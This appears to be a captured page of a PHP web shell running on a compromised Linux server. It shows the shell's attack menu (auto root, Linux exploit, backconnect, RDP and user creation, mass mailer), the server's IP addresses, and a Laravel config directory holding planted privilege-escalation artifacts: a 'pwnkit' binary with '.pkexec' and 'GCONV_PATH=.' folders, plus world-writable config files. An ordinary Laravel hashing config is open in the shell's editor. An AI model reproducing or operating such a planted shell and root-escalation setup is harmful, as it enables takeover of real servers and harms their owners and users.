Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
8.05
KB
-rw-rw-rw-
auth.php
4.21
KB
-rw-rw-rw-
backup.php
9.88
KB
-rw-rw-rw-
broadcasting.php
2.04
KB
-rw-rw-rw-
cache.php
3.2
KB
-rw-rw-rw-
cors.php
846
B
-rw-rw-rw-
database.php
6.43
KB
-rw-rw-rw-
datatables.php
4.02
KB
-rw-rw-rw-
debugbar.php
11.39
KB
-rw-rw-rw-
dompdf.php
11.21
KB
-rw-rw-rw-
filesystems.php
3.24
KB
-rw-rw-rw-
hashing.php
1.54
KB
-rw-rw-rw-
logging.php
3.7
KB
-rw-rw-rw-
mail.php
3.69
KB
-rw-rw-rw-
permission.php
5.45
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.84
KB
-rw-rw-rw-
sanctum.php
2.24
KB
-rw-rw-rw-
services.php
979
B
-rw-rw-rw-
session.php
6.86
KB
-rw-rw-rw-
sweetalert.php
9.34
KB
-rw-rw-rw-
view.php
1.03
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hashing.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Hash Driver |-------------------------------------------------------------------------- | | This option controls the default hash driver that will be used to hash | passwords for your application. By default, the bcrypt algorithm is | used; however, you remain free to modify this option if you wish. | | Supported: "bcrypt", "argon", "argon2id" | */ 'driver' => 'bcrypt', /* |-------------------------------------------------------------------------- | Bcrypt Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Bcrypt algorithm. This will allow you | to control the amount of time it takes to hash the given password. | */ 'bcrypt' => [ 'rounds' => env('BCRYPT_ROUNDS', 10), ], /* |-------------------------------------------------------------------------- | Argon Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Argon algorithm. These will allow you | to control the amount of time it takes to hash the given password. | */ 'argon' => [ 'memory' => 65536, 'threads' => 1, 'time' => 4, ], ];
Close